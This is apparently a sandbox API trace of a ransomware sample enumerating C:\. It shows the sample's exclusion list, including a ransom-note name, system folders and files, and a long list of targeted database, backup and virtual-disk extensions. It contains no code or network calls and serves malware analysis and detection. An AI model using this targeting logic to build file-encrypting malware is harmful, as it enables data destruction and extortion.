RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.554] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.555] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d98 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d98 | out: hHeap=0x2b0000) returned 1 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccb80 | out: hHeap=0x2b0000) returned 1 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0b0 | out: hHeap=0x2b0000) returned 1 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cce98 | out: hHeap=0x2b0000) returned 1 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd2c0 | out: hHeap=0x2b0000) returned 1 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8cd8 | out: hHeap=0x2b0000) returned 1 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.556] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0039.556] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0039.557] CloseHandle (hObject=0x100) returned 1 [0039.557] CloseHandle (hObject=0xf8) returned 1 [0039.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc4f8 | out: hHeap=0x2b0000) returned 1 [0039.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0039.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e30020 | out: hHeap=0x2b0000) returned 1 [0039.559] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="aoldtz.exe") returned 1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2=".") returned 1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="..") returned 1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="windows") returned -1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="bootmgr") returned 1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="temp") returned -1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="pagefile.sys") returned -1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="boot") returned 1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="ids.txt") returned -1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="ntuser.dat") returned -1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="perflogs") returned -1 [0039.559] lstrcmpiW (lpString1="Config.Msi", lpString2="MSBuild") returned -1 [0039.559] lstrlenW (lpString="Config.Msi") returned 10 [0039.559] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0039.559] lstrcpyW (in: lpString1=0x2e2e866, lpString2="Config.Msi" | out: lpString1="Config.Msi") returned="Config.Msi" [0039.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0039.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2c93c0 [0039.559] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e79f0 | out: ListHead=0x2e77d0, ListEntry=0x2e79f0) returned 0x2e7790 [0039.559] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="aoldtz.exe") returned 1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2=".") returned 1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="..") returned 1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows") returned -1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="bootmgr") returned 1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="temp") returned -1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="pagefile.sys") returned -1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="boot") returned 1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="ids.txt") returned -1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="ntuser.dat") returned -1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="perflogs") returned -1 [0039.559] lstrcmpiW (lpString1="Documents and Settings", lpString2="MSBuild") returned -1 [0039.560] lstrlenW (lpString="Documents and Settings") returned 22 [0039.560] lstrlenW (lpString="C:\\Config.Msi") returned 13 [0039.560] lstrcpyW (in: lpString1=0x2e2e866, lpString2="Documents and Settings" | out: lpString1="Documents and Settings") returned="Documents and Settings" [0039.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0039.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2cc4f8 [0039.560] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7a10 | out: ListHead=0x2e77d0, ListEntry=0x2e7a10) returned 0x2e79f0 [0039.560] FindNextFileW (in: hFindFile=0x2ca380, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="aoldtz.exe") returned 1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="windows") returned -1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="bootmgr") returned 1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="temp") returned -1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="pagefile.sys") returned -1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="boot") returned 1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ids.txt") returned -1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ntuser.dat") returned -1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="perflogs") returned -1 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2="MSBuild") returned -1 [0039.560] lstrlenW (lpString="hiberfil.sys") returned 12 [0039.560] lstrlenW (lpString="C:\\Documents and Settings") returned 25 [0039.560] lstrcpyW (in: lpString1=0x2e2e866, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0039.560] lstrlenW (lpString="hiberfil.sys") returned 12 [0039.560] lstrlenW (lpString="Ares865") returned 7 [0039.560] lstrcmpiW (lpString1="fil.sys", lpString2="Ares865") returned 1 [0039.560] lstrlenW (lpString=".dll") returned 4 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".dll") returned 1 [0039.560] lstrlenW (lpString=".lnk") returned 4 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".lnk") returned 1 [0039.560] lstrlenW (lpString=".ini") returned 4 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".ini") returned 1 [0039.560] lstrlenW (lpString=".sys") returned 4 [0039.560] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".sys") returned 1 [0039.560] lstrlenW (lpString="hiberfil.sys") returned 12 [0039.560] lstrlenW (lpString="bak") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="bak") returned 1 [0039.561] lstrlenW (lpString="ba_") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="ba_") returned 1 [0039.561] lstrlenW (lpString="dbb") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="dbb") returned 1 [0039.561] lstrlenW (lpString="vmdk") returned 4 [0039.561] lstrcmpiW (lpString1=".sys", lpString2="vmdk") returned -1 [0039.561] lstrlenW (lpString="rar") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="rar") returned 1 [0039.561] lstrlenW (lpString="zip") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="zip") returned -1 [0039.561] lstrlenW (lpString="tgz") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="tgz") returned -1 [0039.561] lstrlenW (lpString="vbox") returned 4 [0039.561] lstrcmpiW (lpString1=".sys", lpString2="vbox") returned -1 [0039.561] lstrlenW (lpString="vdi") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="vdi") returned -1 [0039.561] lstrlenW (lpString="vhd") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="vhd") returned -1 [0039.561] lstrlenW (lpString="vhdx") returned 4 [0039.561] lstrcmpiW (lpString1=".sys", lpString2="vhdx") returned -1 [0039.561] lstrlenW (lpString="avhd") returned 4 [0039.561] lstrcmpiW (lpString1=".sys", lpString2="avhd") returned -1 [0039.561] lstrlenW (lpString="db") returned 2 [0039.561] lstrcmpiW (lpString1="ys", lpString2="db") returned 1 [0039.561] lstrlenW (lpString="db2") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="db2") returned 1 [0039.561] lstrlenW (lpString="db3") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="db3") returned 1 [0039.561] lstrlenW (lpString="dbf") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="dbf") returned 1 [0039.561] lstrlenW (lpString="mdf") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="mdf") returned 1 [0039.561] lstrlenW (lpString="mdb") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="mdb") returned 1 [0039.561] lstrlenW (lpString="sql") returned 3 [0039.561] lstrcmpiW (lpString1="sys", lpString2="sql") returned 1 [0039.561] lstrlenW (lpString="sqlite") returned 6 [0039.562] lstrcmpiW (lpString1="il.sys", lpString2="sqlite") returned -1 [0039.562] lstrlenW (lpString="sqlite3") returned 7 [0039.562] lstrcmpiW (lpString1="fil.sys", lpString2="sqlite3") returned -1 [0039.562] lstrlenW (lpString="sqlitedb") returned 8 [0039.562] lstrcmpiW (lpString1="rfil.sys", lpString2="sqlitedb") returned -1 [0039.562] lstrlenW (lpString="xml") returned 3 [0039.562] lstrcmpiW (lpString1="sys", lpString2="xml") returned -1 [0039.562] lstrlenW (lpString="$er") returned 3 [0039.562] lstrcmpiW (lpString1="sys", lpString2="$er") returned 1 [0039.562] lstrlenW (lpString="4dd") returned 3 [0039.562] lstrcmpiW (lpString1="sys", lpString2="4dd") returned 1 [0039.562] lstrlenW (lpString="4dl") returned 3 [0039.562] lstrcmpiW (lpString1="sys", lpString2="4dl") returned 1 [0039.562] lstrlenW (lpString="^^^") returned 3 [0039.562] lstrcmpiW (lpString1="sys", lpString2="^^^") returned 1 [0039.562] lstrlenW (lpString="abs") returned 3 [0039.562] lstrcmpiW (lpString1="sys", lpString2="abs") returned 1 [0039.562] lstrlenW (lpString="abx") returned 3 [0039.562] lstrcmpiW (lpString1="sys", lpString2="abx") returned 1 [0039.562] lstrlenW (lpString="accdb") returned 5 [0039.562] lstrcmpiW (lpString1="l.sys", lpString2="accdb") returned 1 [0039.562] lstrlenW (lpString="accdc") returned 5 [0039.562] lstrcmpiW (lpString1="l.sys", lpString2="accdc") returned 1 [0039.562] lstrlenW (lpString="accde") returned 5 [0039.562] lstrcmpiW (lpString1="l.sys", lpString2="accde") returned 1 [0039.562] lstrlenW (lpString="accdr") returned 5 [0039.562] lstrcmpiW (lpString1="l.sys", lpString2="accdr") returned 1 [0039.562] lstrlenW (lpString="accdt") returned 5 [0039.562] lstrcmpiW (lpString1="l.sys", lpString2="accdt") returned 1 [0039.562] lstrlenW (lpString="accdw") returned 5 [0039.562] lstrcmpiW (lpString1="l.sys", lpString2="accdw") returned 1 [0039.562] lstrlenW (lpString="accft") returned 5 [0039.562] lstrcmpiW (lpString1="l.sys", lpString2="accft") returned 1 [0039.562] lstrlenW (lpString="adb") returned 3 [0039.562] lstrcmpiW (lpString1="sys", lpString2="adb") returned 1 [0039.562] lstrlenW (lpString="adb") returned 3 [0039.562] lstrcmpiW (lpString1="sys", lpString2="adb") returned 1 [0039.563] lstrlenW (lpString="ade") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="ade") returned 1 [0039.563] lstrlenW (lpString="adf") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="adf") returned 1 [0039.563] lstrlenW (lpString="adn") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="adn") returned 1 [0039.563] lstrlenW (lpString="adp") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="adp") returned 1 [0039.563] lstrlenW (lpString="alf") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="alf") returned 1 [0039.563] lstrlenW (lpString="ask") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="ask") returned 1 [0039.563] lstrlenW (lpString="btr") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="btr") returned 1 [0039.563] lstrlenW (lpString="cat") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="cat") returned 1 [0039.563] lstrlenW (lpString="cdb") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="cdb") returned 1 [0039.563] lstrlenW (lpString="ckp") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="ckp") returned 1 [0039.563] lstrlenW (lpString="cma") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="cma") returned 1 [0039.563] lstrlenW (lpString="cpd") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="cpd") returned 1 [0039.563] lstrlenW (lpString="dacpac") returned 6 [0039.563] lstrcmpiW (lpString1="il.sys", lpString2="dacpac") returned 1 [0039.563] lstrlenW (lpString="dad") returned 3 [0039.563] lstrcmpiW (lpString1="sys", lpString2="dad") returned 1 [0039.563] lstrlenW (lpString="dadiagrams") returned 10 [0039.563] lstrcmpiW (lpString1="berfil.sys", lpString2="dadiagrams") returned -1 [0039.563] lstrlenW (lpString="daschema") returned 8 [0039.563] lstrcmpiW (lpString1="rfil.sys", lpString2="daschema") returned 1 [0039.563] lstrlenW (lpString="db-journal") returned 10 [0039.563] lstrcmpiW (lpString1="berfil.sys", lpString2="db-journal") returned -1 [0039.563] lstrlenW (lpString="db-shm") returned 6 [0039.563] lstrcmpiW (lpString1="il.sys", lpString2="db-shm") returned 1 [0039.563] lstrlenW (lpString="db-wal") returned 6 [0039.564] lstrcmpiW (lpString1="il.sys", lpString2="db-wal") returned 1 [0039.564] lstrlenW (lpString="dbc") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dbc") returned 1 [0039.564] lstrlenW (lpString="dbs") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dbs") returned 1 [0039.564] lstrlenW (lpString="dbt") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dbt") returned 1 [0039.564] lstrlenW (lpString="dbv") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dbv") returned 1 [0039.564] lstrlenW (lpString="dbx") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dbx") returned 1 [0039.564] lstrlenW (lpString="dcb") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dcb") returned 1 [0039.564] lstrlenW (lpString="dct") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dct") returned 1 [0039.564] lstrlenW (lpString="dcx") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dcx") returned 1 [0039.564] lstrlenW (lpString="ddl") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="ddl") returned 1 [0039.564] lstrlenW (lpString="dlis") returned 4 [0039.564] lstrcmpiW (lpString1=".sys", lpString2="dlis") returned -1 [0039.564] lstrlenW (lpString="dp1") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dp1") returned 1 [0039.564] lstrlenW (lpString="dqy") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dqy") returned 1 [0039.564] lstrlenW (lpString="dsk") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dsk") returned 1 [0039.564] lstrlenW (lpString="dsn") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dsn") returned 1 [0039.564] lstrlenW (lpString="dtsx") returned 4 [0039.564] lstrcmpiW (lpString1=".sys", lpString2="dtsx") returned -1 [0039.564] lstrlenW (lpString="dxl") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="dxl") returned 1 [0039.564] lstrlenW (lpString="eco") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="eco") returned 1 [0039.564] lstrlenW (lpString="ecx") returned 3 [0039.564] lstrcmpiW (lpString1="sys", lpString2="ecx") returned 1 [0039.564] lstrlenW (lpString="edb") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="edb") returned 1 [0039.565] lstrlenW (lpString="epim") returned 4 [0039.565] lstrcmpiW (lpString1=".sys", lpString2="epim") returned -1 [0039.565] lstrlenW (lpString="fcd") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fcd") returned 1 [0039.565] lstrlenW (lpString="fdb") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fdb") returned 1 [0039.565] lstrlenW (lpString="fic") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fic") returned 1 [0039.565] lstrlenW (lpString="flexolibrary") returned 12 [0039.565] lstrlenW (lpString="fm5") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fm5") returned 1 [0039.565] lstrlenW (lpString="fmp") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fmp") returned 1 [0039.565] lstrlenW (lpString="fmp12") returned 5 [0039.565] lstrcmpiW (lpString1="l.sys", lpString2="fmp12") returned 1 [0039.565] lstrlenW (lpString="fmpsl") returned 5 [0039.565] lstrcmpiW (lpString1="l.sys", lpString2="fmpsl") returned 1 [0039.565] lstrlenW (lpString="fol") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fol") returned 1 [0039.565] lstrlenW (lpString="fp3") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fp3") returned 1 [0039.565] lstrlenW (lpString="fp4") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fp4") returned 1 [0039.565] lstrlenW (lpString="fp5") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fp5") returned 1 [0039.565] lstrlenW (lpString="fp7") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fp7") returned 1 [0039.565] lstrlenW (lpString="fpt") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="fpt") returned 1 [0039.565] lstrlenW (lpString="frm") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="frm") returned 1 [0039.565] lstrlenW (lpString="gdb") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="gdb") returned 1 [0039.565] lstrlenW (lpString="gdb") returned 3 [0039.565] lstrcmpiW (lpString1="sys", lpString2="gdb") returned 1 [0039.565] lstrlenW (lpString="grdb") returned 4 [0039.566] lstrcmpiW (lpString1=".sys", lpString2="grdb") returned -1 [0039.566] lstrlenW (lpString="gwi") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="gwi") returned 1 [0039.566] lstrlenW (lpString="hdb") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="hdb") returned 1 [0039.566] lstrlenW (lpString="his") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="his") returned 1 [0039.566] lstrlenW (lpString="ib") returned 2 [0039.566] lstrcmpiW (lpString1="ys", lpString2="ib") returned 1 [0039.566] lstrlenW (lpString="idb") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="idb") returned 1 [0039.566] lstrlenW (lpString="ihx") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="ihx") returned 1 [0039.566] lstrlenW (lpString="itdb") returned 4 [0039.566] lstrcmpiW (lpString1=".sys", lpString2="itdb") returned -1 [0039.566] lstrlenW (lpString="itw") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="itw") returned 1 [0039.566] lstrlenW (lpString="jet") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="jet") returned 1 [0039.566] lstrlenW (lpString="jtx") returned 3 [0039.566] lstrcmpiW (lpString1="sys", lpString2="jtx") 